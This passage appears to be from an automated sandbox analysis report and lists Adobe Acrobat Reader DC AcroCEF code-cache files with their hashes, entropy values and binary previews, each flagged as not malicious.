                                                                                                                                                                                                                                                        Entropy (8bit):5.492039616665217
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:ms2VYOFLvEWdvBIEGdeXuJAuR11TK6tElEs2VYOFLvEWdvBIEGdeXu0Dcr11TK6t:BsR2EseMPalTsR2EsetE
                                                                                                                                                                                                                                                        MD5:E43982F8FF6694E9051FE9546A32185D
                                                                                                                                                                                                                                                        SHA1:68963D4A8F73FBE79D388063A057B09F0D8B1A04
                                                                                                                                                                                                                                                        SHA-256:50F4DC4A07F525EAEA30095A2B1D80E7779DCCFD78EEE2917124A7A56EB5EE29
                                                                                                                                                                                                                                                        SHA-512:CC0BFC3FA6DCB04FA1C0139DE7F25022EE78C6261B4DA50008D7CF29777B21AF002130682489E3B35FD943E66E32AADE21530D8D9365344EBC9849272C9FABF0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js .ZQ.E.#/....."#.D.Z...0.A.A.o]@r..Q.....<w.....].n\....A..Eo...................A..Eo.......oD.........0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js .P..E.#/....."#.D..z..0.A.A.o]@r..Q.....<w.....].n\....A..Eo...................A..Eo.......e..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):404
                                                                                                                                                                                                                                                        Entropy (8bit):5.636430516906278
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:maVYOFLvEWdwAPCQ7WB7OhKlvA1TK6t9/EaVYOFLvEWdwAPCQJlQwoB7OhKlvA13:RbR16vBJkbbR160lQ1BJk
                                                                                                                                                                                                                                                        MD5:FC4F6400DC58CA60EB6FC7864C4BDA0B
                                                                                                                                                                                                                                                        SHA1:34868D1698779BF4E2D26E341D3F5CE033A383AC
                                                                                                                                                                                                                                                        SHA-256:3A959303C23CC3885AF00D612121244FEAAF858CB1FC9D186DC53447D957557F
                                                                                                                                                                                                                                                        SHA-512:A97CF1E04EA3A86BE65F4D285C291D1EED2E4D6D590809CCBD0DF82F6D910209C810A316293B81069BA5FF5ABDC70606C1E5D629FBA67F39659673B14006E035
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ....E.#/....."#.DV.s..0.A..4T].....Tw.....(..b...EO....9.A..Eo...................A..Eo.......}I.........0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ..p.E.#/....."#.D..m..0.A..4T].....Tw.....(..b...EO....9.A..Eo...................A..Eo.......t.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):422
                                                                                                                                                                                                                                                        Entropy (8bit):5.586997334822384
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:ms2gEYOFLvEWdGQRQVuxvrRQdFt1TK6tUEs2gEYOFLvEWdGQRQVuPyr6QdFt1TKL:B2geRHRQerR0iT2geRHRQn60i
                                                                                                                                                                                                                                                        MD5:3F64DA05E63DCBDFC6D93F341772FF8F
                                                                                                                                                                                                                                                        SHA1:C209869A0D303BD66E0BD7958A1886E227F5CE21
                                                                                                                                                                                                                                                        SHA-256:24F78E7CB62ED378722E985776F43C63FE28ECEE3D6131770DCFAD54A819CD3A
                                                                                                                                                                                                                                                        SHA-512:6DBE2C36148D3646FEC4A066FE8F3673F39726BCB1D635EBBF674A0E794D522DE2D419BF5DF9FD561FBF130FCD30CEA8BBE70891436A57286BCFADF4E4E8EC13
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js .. .E.#/....."#.Dt~...0.A@..{o]...9o|..qY....T....{..u.b..A..Eo...................A..Eo........h[........0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js .e..E.#/....."#.D.Hx..0.A@..{o]...9o|..qY....T....{..u.b..A..Eo...................A..Eo.........)........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):824
                                                                                                                                                                                                                                                        Entropy (8bit):5.653484535146409
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:WyeRljAt1w/lEyeRlC2t1w2myeRlA+4t1wLyeRlXt1w/:WJrAfw+JXfw3Jl4fwLJPfw/
                                                                                                                                                                                                                                                        MD5:DA0640CFB31FF35B4D45237B338E8824
                                                                                                                                                                                                                                                        SHA1:820923E14B7CB7C4E8127ABDE022B5E055BA3D81
                                                                                                                                                                                                                                                        SHA-256:B215AF902A37783670BD749EC73C684FB26897413A64528FEF75256682C0E53E
                                                                                                                                                                                                                                                        SHA-512:E0C52ED15983CC30403F04DB144D4B99FBBF8CF6ED5B2303FF43D430A664A824DF11F89F126FBBF1482894A0DE5EA5259A65C5C9D3E38D06B536AD3D333F3BCE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ..WE.#/....."#.D....0.A.t\a......x5.'OuE.C..@......x..A..Eo...................A..Eo..................0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js .6g.E.#/....."#.D..k..0.A.t\a......x5.'OuE.C..@......x..A..Eo...................A..Eo......Ry'.........0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js .`..E.#/....."#.Dz....0.A.t\a......x5.'OuE.C..@......x..A..Eo...................A..Eo.................0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ../.E.#/....."#.D*.g..0.A.t\a......x5.'OuE.C..@......x..A..Eo...................A..Eo......+\..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):436
                                                                                                                                                                                                                                                        Entropy (8bit):5.540145112292629
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mnYOFLvEWdhwyuHSGqwK+41TK6t/2nYOFLvEWdhwyu5pGR6IqwK+41TK6tHR:wRhUUwK+EhgRhRR6hwK+E
                                                                                                                                                                                                                                                        MD5:B49E7B26354B8F151BD2780ADCD37707
                                                                                                                                                                                                                                                        SHA1:D4E1B31E08A701DCC00CC36277FF294C4289B400
                                                                                                                                                                                                                                                        SHA-256:E68C1CC1904C45C958D94BC7D7ABC9ECC206A5FE46ADB478AD576C757FF5E591
                                                                                                                                                                                                                                                        SHA-512:5D3E30DB7939FC8E0244A059EE7249CCB7DD30C63ED0F15D6EF66882396FC44913A740D3524B99B8DBCCF2B6430BAEB21EF1B1C1A709CDD29AB45B3AFEFD105B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js ....E.#/....."#.D..r..0.A.......7...o..a=.98I......(3.$G.A..Eo...................A..Eo......$.3........0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js ..o.E.#/....."#.D0.m..0.A.......7...o..a=.98I......(3.$G.A..Eo...................A..Eo.................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):920
                                                                                                                                                                                                                                                        Entropy (8bit):5.5958992285557105
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:/RrROk/w+bsfLEItvRrROk/UzsfLE6RrROk/VPNbsfLEIRrROk//bsfLE:/PJ/XI4YvPJ/546PJ/I4IPJ/g4
                                                                                                                                                                                                                                                        MD5:3F87DAB1289E6A0EFDAEFBE8FC39E841
                                                                                                                                                                                                                                                        SHA1:C646A53EECAFB48F3607681A30D081CEDC7E7182
                                                                                                                                                                                                                                                        SHA-256:82EB911D63BDC58DEF127425DA48FD41D696EAAA997F4437D2071D3537BA5E81
                                                                                                                                                                                                                                                        SHA-512:2A21B34BCE11E5937D8AC05A8BF9078B8D6E863BCE3A7DAA548D7B54EC31260FA76768E74C468F4B59BF54A3B4E6514FA99DDF07BB4B9972E4D9F408DB25A2D4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js .0SWE.#/....."#.DG....0.A..~..rw.+[....!.)?..f.U..(=.=.A..Eo...................A..Eo........!.........0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ..=.E.#/....."#.D.uk..0.A..~..rw.+[....!.)?..f.U..(=.=.A..Eo...................A..Eo......~`.#........0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ....E.#/....."#.D.b...0.A..~..rw.+[....!.)?..f.U..(=.=.A..Eo...................A..Eo........Yi........0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ..-.E.#/....."#.D..g..0.A..~..rw.+[....!.)?..f.U..(=.=.A..Eo...................A..Eo.......{..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):744
                                                                                                                                                                                                                                                        Entropy (8bit):5.608841549548081
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:xqTOgoCPLnYqTmG5CPLnmqTavCPLn1sTqTpMCPLnM:AyLMnvj5MnZgMn1jlMMnM
                                                                                                                                                                                                                                                        MD5:44A6DFDEAD0E9843C1A32DF39EFD4B9B
                                                                                                                                                                                                                                                        SHA1:42CA27326DAF0BEC4D85AF39A66B1CA7EA68F8A2
                                                                                                                                                                                                                                                        SHA-256:1196309D09D927B08E4F25EF56E3A33967ED6629867987A271B1E232D2F371A0
                                                                                                                                                                                                                                                        SHA-512:B2E40F9CEF90BFABDF5337FDDCAEEEE46C66758BA9D537ED678540F77E0BA41D8B2BDD58B750F49BF7E9383F71D22920CEDA6EDD3364D5CAC15C14A4AC858536
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js .?qUE.#/....."#.DI....0.A..~]...%s..<...n.f..<.....1#..U..A..Eo...................A..Eo.......Qw.........0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js .c.E.#/....."#.D..e..0.A..~]...%s..<...n.f..<.....1#..U..A..Eo...................A..Eo......[..........0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ."t.E.#/....."#.D.....0.A..~]...%s..<...n.f..<.....1#..U..A..Eo...................A..Eo......u.a.........0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ..|.E.#/....."#.D. c..0.A..~]...%s..<...n.f..<.....1#..U..A..Eo...................A..Eo......4...........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):828
                                                                                                                                                                                                                                                        Entropy (8bit):5.673925968084092
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:zRM9XgzsDsRMBzsDNRMdmzsDfRMGUNzsD8:zEggDssgDNtgDfnUNgD
                                                                                                                                                                                                                                                        MD5:DDC565FC42CBA22CB571C903CE06542C
                                                                                                                                                                                                                                                        SHA1:F00A0E4FD531E7FEF278E72F35501E209DAA9490
                                                                                                                                                                                                                                                        SHA-256:887EAA27B1CEE9127DDFC235E896AC7DF49CDE405AA03CD33E0FD209D51AC621
                                                                                                                                                                                                                                                        SHA-512:253C40DF810BE39B87E6325E9B3D4D80ECD3819101984988DD032838BCF726BC8B304EDDE8A033DD793D6033FE7CFE0A96256F8085B5A9B2B02B7F5903430AC3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ./.YE.#/....."#.D.....0.A..z._a...'.v.......4p3..1.']...A..Eo...................A..Eo......b...........0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js .>X.E.#/....."#.D.8...0.A..z._a...'.v.......4p3..1.']...A..Eo...................A..Eo........N.........0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ....E.#/....."#.D.z...0.A..z._a...'.v.......4p3..1.']...A..Eo...................A..Eo.................0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js .}2.E.#/....."#.Dp.{..0.A..z._a...'.v.......4p3..1.']...A..Eo...................A..Eo.......AS.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):840
                                                                                                                                                                                                                                                        Entropy (8bit):5.608320331964856
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:6lJRTnFoMkClJRlFoMdlJRulXFoMjlJRVqBFoMA/:YFnFoMkwDFoMJOFoMX/8FoM
                                                                                                                                                                                                                                                        MD5:B3EEAEAABC5AD2BB53368364B1A500A6
                                                                                                                                                                                                                                                        SHA1:6B6E534E720336B4CA22B2F17AD17DBDA346AB6E
                                                                                                                                                                                                                                                        SHA-256:5B2ACD73DDEC5393817E79A7B31075EFD64E9D3BD7B2192489BE4BB745756BB6
                                                                                                                                                                                                                                                        SHA-512:2061DF2D04CB696E7FE641794E774EC370D2FD3B44A9F6B30D9B51360A166A6778AC0582CA4CEE8F5B1A6085135B4DAFF640FA400663B651696F3DF1540566A9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js .`.YE.#/....."#.D.....0.Ac}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo...................A..Eo......i?n.........0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ..t.E.#/....."#.D.Q...0.Ac}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo...................A..Eo........}........0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js .y..E.#/....."#.DW....0.Ac}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo...................A..Eo......f..........0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ..|.E.#/....."#.D.}..0.Ac}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo...................A..Eo.......,.(........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):892
                                                                                                                                                                                                                                                        Entropy (8bit):5.60294702377411
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:F8hRrROk/qje2aQn8hRrROk/Faue2WV8hRrROk/ne2E8hRrROk/Z6Dqe2:UPJ/qC2avPJ/Qt2lPJ/e2FPJ/Ml2
                                                                                                                                                                                                                                                        MD5:2F78DFFB70EFB22E8A504951BF6346F2
                                                                                                                                                                                                                                                        SHA1:3DED7E516FFF6BB785D2E374A6CA01C024889D78
                                                                                                                                                                                                                                                        SHA-256:B2E8C75F92D6F44D5456B527FB48591E1ED0E81A0EB252CC7903619B801BB89E
                                                                                                                                                                                                                                                        SHA-512:1B5FA4BCA55AFBDF7F6EB24FB0610A30A1A220C49F53D658E12865157DFC96F8E9910FD6A998F2C27EFAFE4470AC12AF520D43509985602B2906AFE4E9E53A27
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ..PWE.#/....."#.D.s...0.A..%.k.SZ..~W.....:)'B..ad......A..Eo...................A..Eo......hj.=........0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ../.E.#/....."#.D.fk..0.A..%.k.SZ..~W.....:)'B..ad......A..Eo...................A..Eo.........s........0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ....E.#/....."#.D.....0.A..%.k.SZ..~W.....:)'B..ad......A..Eo...................A..Eo.......R.........0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ....E.#/....."#.D].f..0.A..%.k.SZ..~W.....:)'B..ad......A..Eo...................A..Eo......W...........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):852
                                                                                                                                                                                                                                                        Entropy (8bit):5.671650682950022
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:ehRcUerNJICpmhRcgrNJIC3yhRc+QRrNJIC0hRc7erNJIC5o:eh6JICpmhXJIC3yhvaJIC0hFJIC5o
                                                                                                                                                                                                                                                        MD5:9D8C14F0B46695A93EAADDF9A0834EFF
                                                                                                                                                                                                                                                        SHA1:37AF828282415E1399A92C9209A1996CF3A64FA0
                                                                                                                                                                                                                                                        SHA-256:8D6016CDAD3B9BE107AF7F90239CFFBF712019ECF891413BA889A9346C3FF009
                                                                                                                                                                                                                                                        SHA-512:5B51C688FEFC782F662244D6CD91D447F01A9F105A6D6D94EBD7F3F6857747CCB182C5050F1D7ADA86C5802414F0FFB0820777B2FB227E9DCC12839C9BE66D6F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ...WE.#/....."#.DM....0.A.;"./N_.,.:C..2....9L.H...3:...A..Eo...................A..Eo......\...........0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js .ci.E.#/....."#.D..k..0.A.;"./N_.,.:C..2....9L.H...3:...A..Eo...................A..Eo......-.Qw........0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js .G..E.#/....."#.D.....0.A.;"./N_.,.:C..2....9L.H...3:...A..Eo...................A..Eo.................0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ..W.E.#/....."#.D.:g..0.A.;"./N_.,.:C..2....9L.H...3:...A..Eo...................A..Eo......6J.#........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):832
                                                                                                                                                                                                                                                        Entropy (8bit):5.593667163839036
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mOEYOFLvEWdrIhuAPxGLzgm2d/1TK6tX98OEYOFLvEWdrIhuO5yvLzgm2d/1TK6E:0RmeReh9SRJReJRyERexRLRe
                                                                                                                                                                                                                                                        MD5:7F11AA7418A347DB05BC40D237595E9C
                                                                                                                                                                                                                                                        SHA1:8CF61707EA1D7BE0BD15E084C12F214BE74DE5E1
                                                                                                                                                                                                                                                        SHA-256:AEB6E6F1BE1834C54F45E5FFE429A881DD4810E6D69CE85111A025284721A9DC
                                                                                                                                                                                                                                                        SHA-512:489EA2830C140B555F45CD6351300C5F9022E00955107AED8F0AC286A9890217E2B1119F0CEB5B60F1F799309816F0CC7CDBF1D0D1670E0F7EC9A2DC2F05911F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js ...WE.#/....."#.D.V...0.AZ.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo...................A..Eo......'.* ........0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .e..E.#/....."#.D.<k..0.AZ.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo...................A..Eo......W .........0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .q..E.#/....."#.D.....0.AZ.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo...................A..Eo.......B."........0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js ....E.#/....."#.D.rf..0.AZ.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo...................A..Eo......9^I.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):752
                                                                                                                                                                                                                                                        Entropy (8bit):5.631926624224222
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mAElVYOFLvEW1Kikx56uvp1TK6toAElVYOFLvEW1KTB2LWGOkx56uvp1TK6tGeAM:6JJKxuJJK0WKoiJJKQRMKLJJK5Q
                                                                                                                                                                                                                                                        MD5:2246B51DD8025ABFD629DDA8DFC5CEA6
                                                                                                                                                                                                                                                        SHA1:0B82DDA5B5EFDA64984D8B12B62B85004E2E0354
                                                                                                                                                                                                                                                        SHA-256:93A80FB4B8CB79EFC1F8A6B95F76AA525EB76B4015257913331C729E67E0EAB9
                                                                                                                                                                                                                                                        SHA-512:42AA1F617630710C4CF8ED550C6D07D0D58D5F6C54F8C7B0166C3015A6EF916ED1AC49F312C1BECB4529EC0D3FB679E7F7AB7F50DF85ACA7D69589DE3E349DCE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js .n.LE.#/....."#.D'l...0.Az?...SwC...^..y.....V..7R-O.....A..Eo...................A..Eo......dZ.2........0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js ....E.#/....."#.Dm.I..0.Az?...SwC...^..y.....V..7R-O.....A..Eo...................A..Eo......._..........0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js .~..E.#/....."#.D.....0.Az?...SwC...^..y.....V..7R-O.....A..Eo...................A..Eo........d.........0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js .:..E.#/....."#.Du.I..0.Az?...SwC...^..y.....V..7R-O.....A..Eo...................A..Eo.......EKO........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):428
                                                                                                                                                                                                                                                        Entropy (8bit):5.6226827985159185
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mWYOFLvEWdBJvvuugFGvhUDLYtmOZn1TK6tueWYOFLvEWdBJvvuPQhUDLYtmOZn5:xRBJE4KDcFZLuRBJcDcFZL
                                                                                                                                                                                                                                                        MD5:D902494DDEB4F3F0B961FACD78E3579E
                                                                                                                                                                                                                                                        SHA1:60B8C843DE5599E5BD4FEF7AACFAC6F30884B316
                                                                                                                                                                                                                                                        SHA-256:7C055858699AB61C3C80FB3C83A6E4FAF6A7CD970471E337E1216B2E7CF8033D
                                                                                                                                                                                                                                                        SHA-512:51B3597EA66F96F87F0C72B1C18D62733452E09349CB608454C198334C1151E4C439D19FB45C6C76ED68065BC292D54F9920CEA0797C984A96AC6BE815EB56E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js ..T.E.#/....."#.D....0.A....t.q..W.EZ....1...[.zC.7mD..A..Eo...................A..Eo......f...........0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js .r..E.#/....."#.D.X{..0.A....t.q..W.EZ....1...[.zC.7mD..A..Eo...................A..Eo......n.b.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):844
                                                                                                                                                                                                                                                        Entropy (8bit):5.612946901682212
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:BPHdrcoPHNcVRPHWKw0kcXHZPHzcOEc9c:BPHtcoPHNcjPHW50kcX5PHzcOEc
                                                                                                                                                                                                                                                        MD5:8173BB6193375FE8B2020B9689415CB1
                                                                                                                                                                                                                                                        SHA1:5F51CD1B218B72BB45B63BC6A4DA0F5CA87DC12B
                                                                                                                                                                                                                                                        SHA-256:FA2C4DB8EB2C8BB2F8523F0AF446BB828DA398C8C349D26F177D165A4B21FD6A
                                                                                                                                                                                                                                                        SHA-512:D427DBBC60FCDC93FA3A6AE4DD8B48FF4B125C0897E7C89BCB5259C7C97912CB649CE07A1A94F4CD609898E923E14ABA97EC3ADA2474055499FF45E043AE7970
